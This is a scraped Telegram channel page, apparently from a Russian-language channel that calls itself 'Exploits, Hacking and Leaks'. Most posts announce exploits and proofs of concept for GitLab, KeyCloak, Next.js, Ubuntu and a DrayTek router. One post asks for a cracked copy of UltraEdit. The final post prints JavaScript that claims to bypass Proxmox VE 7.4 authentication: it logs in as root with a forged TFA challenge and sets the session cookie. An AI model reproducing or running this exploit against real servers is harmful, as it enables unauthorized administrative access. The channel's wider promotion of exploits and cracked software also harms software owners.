Proxy Bar
21.3K subscribers
1.72K photos
104 videos
669 files
1.76K links
Exploits, Hacking and Leaks

Чат группы - https://t.me/

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
CVE-2026-19478 — GitLab
*
A/B lab + safe PoC
👍9🔥8😱1
Fuck eah !!!
*
tmp.0ut 5 Volume
🔥33👍4😱1
25 august 1991
Некий фин, зарелизил core
О чем не постеснялся заявить через Usenet в группу comp.os.minix
а дальше фина понесло, да и остальных зацепило.
С праздником !

#linux35 #50letVLKSM
👍35🔥16😱4
CVE-2026-18963 KeyCloak
*
reset-credentials bypass → unauthenticated account takeover

PoCexploit
👍20😱5🔥2
Two Zero-Days in the DrayTek Vigor2962 Router
*
read


Рубрика нас просят (пора с этим завязывать)
👍9🔥3😱1
Есть у кого ISO ?
А то срочно нужен ULTRAedit 6.10a с крЕками 😢
👍34🔥19😱7
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2026-75604 Next.js Windows RCE
*
PoC
👍14🔥4😱3
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2026-72137 ubuntu-7.0.0-28 LPE
*
exploit
👍16🔥11😱1
Зло все еще может вернуться, оно просто умеет ждать
😱19👍15🔥2
Proxmox VE
*
PVE 7.4 auth-bypass exploit
// PVE 7.4 auth-bypass @NebuSec 2026
// First, make sure to try logging in as root with this exact password: root@pam
(async () => {
const form = new URLSearchParams({
username: "root@pam",
password: "root@pam",
"tfa-challenge": "NEBUSEC-CHALLENGE",
});
const loginResponse = await fetch("/api2/json/access/ticket", {
method: "POST",
credentials: "omit",
headers: { "Content-Type": "application/x-www-form-urlencoded;charset=UTF-8" },
body: form,
});
const loginBody = await loginResponse.json();
document.cookie = `PVEAuthCookie=${loginBody?.data?.ticket}; Path=/; Secure; SameSite=Strict`;
location.reload()
})();
😱19👍18🔥7